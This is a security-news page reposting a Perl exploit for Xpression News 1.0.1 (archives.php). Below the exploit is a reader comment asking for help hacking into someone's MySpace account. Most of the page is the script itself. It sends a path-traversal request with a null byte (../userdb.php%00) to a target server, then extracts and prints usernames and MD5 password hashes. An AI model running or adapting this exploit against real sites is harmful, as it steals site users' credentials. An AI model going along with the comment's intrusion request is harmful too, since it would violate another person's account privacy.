_
_ _ 05.12.2008
 
_ Navigation: _
Main Page Technology Downloads Security Entertainment Videos
Search Site: Advanced
_
 
Login Login
 
Register Register
   
_ News Item

Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit

Feb 21 2007 09:46:38
Source: ace
vote bad  vote good
+17
#################################################################################################

# r0ut3r Presents..

#

# #

# Another r0ut3r discovery! #

# writ3r [at] gmail.com #

# #

# XNews Remote File Disclosure Exploit #

#################################################################################################

# Software: Xnews 1.0.1 #

# #

# Vendor: http://xpression.hogsmeade-village.com/ #

# #

# Released: 2007/01/28 #

# #

# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #

# #

# Note: The information provided in this document is for Xnews administrator #

# testing purposes only! #

# #

# Whats up Timq, tgo, str0ke, dr max virus #

#################################################################################################



use IO::Socket;



$port = "80"; # connection port

$target = shift; # xpression.hogsmeade-village.com

$folder = shift; # /demo/



sub Header()

{

print q

{Xpression News File Disclosure Exploit - writ3r [at] gmail.com

--------------------------------------------------------------

};

}



sub Usage()

{

print q

{Usage: xnewsxpl.pl [target] [directory]

Example: xnewsxpl.pl xpression.hogsmeade-village.com /demo/

};

exit();

}



Header();



if (!$target || !$folder) {

Usage(); }



$res = false;

print "[+] Connecting...\r\n";

$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt.

Exiting...\r\n";

print $xpack "GET ".$folder."archives.php?xnews-template=../userdb.php%00 HTTP/1.1\n";

print $xpack "Host: $target\n";

print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";

print $xpack "Accept: text/html\n";

print $xpack "Connection: keep-alive\n\n\r\n";



while (<$xpack>)

{

if (/(.*?)\|(.*?)\|(.*?)\|/) {

print "Username: $1\n";

print "MD5 Hash: $3\n";

$res = true;

exit; }



}

if ($res eq false) {

print "[-] Exploit failed - Not vulnerable\n"; }



print "[!] Connection to host lost...\n";

.

» full story @ source-link: ace
Related Articles:
» Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
» S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
» PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
» SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
_ Comments
Add Comment
You must be registered and logged in to add comments!

Register
Login
#1 jacki1 04.17.2007  
i was going to type something unture because i did not want other people to know why i wanted and need help with hacking in to someone profile on myspace but my reason is i think my child is on drugs please help me i need your help with this i do not want to loss my child i have know one to ask thank you for your time my email is vergarajackie1@hotmail.com
_ Sponsors

_ Sponsors